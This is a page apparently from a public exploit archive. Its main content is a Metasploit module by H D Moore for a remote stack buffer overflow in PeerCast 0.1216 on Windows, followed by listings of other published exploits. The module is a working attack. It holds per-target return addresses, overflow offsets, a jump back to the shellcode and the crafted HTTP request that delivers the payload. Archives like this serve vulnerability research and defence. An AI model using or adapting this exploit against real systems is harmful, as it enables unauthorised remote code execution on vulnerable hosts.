Menu

Search for hundreds of thousands of exploits

"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)"

Author

Exploit author

"H D Moore"

Platform

Exploit platform

windows

Release date

Exploit published date

2006-03-30

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::peercast_url_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

	'Name'  => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)',
	'Version'  => '$Revision: 1.2 $',
	'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32' ],
	'Priv'  => 0,
	
	'AutoOpts'	=> { 'EXITFUNC' => 'process' },

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 7144],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Payload' =>
	  {
		'Space'     => 400,
		'BadChars'  => "\x00\x0a\x0d\x20\x0d",
		'Keys'      => ['+ws2ord'],
		'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",  # add esp, -3500
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module exploits a stack overflow in PeerCast <= v0.1216. 
	The vulnerability is caused due to a boundary error within the
	handling of URL parameters.
}),

	'Refs'  =>
	  [
	  	['OSVDB', '23777'],
		['BID', '17040'],
		['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
	  ],

	'Targets' =>
	  [
		['Windows 2000 English SP0-SP4', 0x75023360 ],
		['Windows 2003 English SP0-SP1', 0x77d099e3 ],
		['Windows XP English SP0/SP1', 0x77dbfa2c],
		['Windows XP English SP0/SP2', 0x77dc12b8],
	  ],

	'Keys' => ['peercast'],

	'DisclosureDate' => 'March 8 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $offset      = $self->GetVar('OFFSET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	my $pattern = Pex::Text::AlphaNumText(1024);
	
	# Return to EDI (offset 812)
	substr($pattern, 768, 4, pack('V', $target->[1]));
	
	# Jump back to the shellcode
	substr($pattern, 812, 5, "\xe9".pack("V", -517));
	
	# Insert he payload at offset 300 to avoid corruption
	substr($pattern, 300, length($shellcode), $shellcode);
	
	my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n";
	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;

# milw0rm.com [2006-03-30]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2009-11-12 "Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)" dos windows "H D Moore"
2009-10-30 "Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)" webapps unix "H D Moore"
2009-07-20 "DD-WRT HTTP v24-SP1 - Command Injection" remote linux "H D Moore"
2007-04-23 "Apple QuickTime for Java 7 - Memory Access (Metasploit)" remote multiple "H D Moore"
2006-11-13 "D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)" remote windows "H D Moore"
2006-11-13 "Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)" remote windows "H D Moore"
2006-11-01 "Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)" dos hardware "H D Moore"
2006-09-27 "Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)" remote windows "H D Moore"
2006-08-10 "Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)" remote windows "H D Moore"
2006-08-10 "Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)" remote windows "H D Moore"
2006-07-28 "Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution" remote multiple "H D Moore"
2006-07-25 "Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)" remote multiple "H D Moore"
2006-07-14 "Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)" remote multiple "H D Moore"
2006-07-07 "Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow" dos windows "H D Moore"
2006-06-22 "Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)" remote windows "H D Moore"
2006-05-15 "RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)" remote multiple "H D Moore"
2006-04-15 "Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)" remote novell "H D Moore"
2006-03-30 "PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2006-03-20 "X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation" local linux "H D Moore"
2006-03-01 "Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)" remote osx "H D Moore"
2006-02-28 "Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)" remote windows "H D Moore"
2006-02-22 "Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-17 "Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)" remote windows "H D Moore"
2006-02-08 "Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-07 "Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)" remote linux "H D Moore"
2006-01-31 "Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2005-12-27 "Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)" remote windows "H D Moore"
2005-12-09 "Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)" remote windows "H D Moore"
2005-11-20 "Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)" remote hardware "H D Moore"
2005-10-19 "HP-UX 11.11 - lpd Remote Command Execution (Metasploit)" remote hp-ux "H D Moore" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected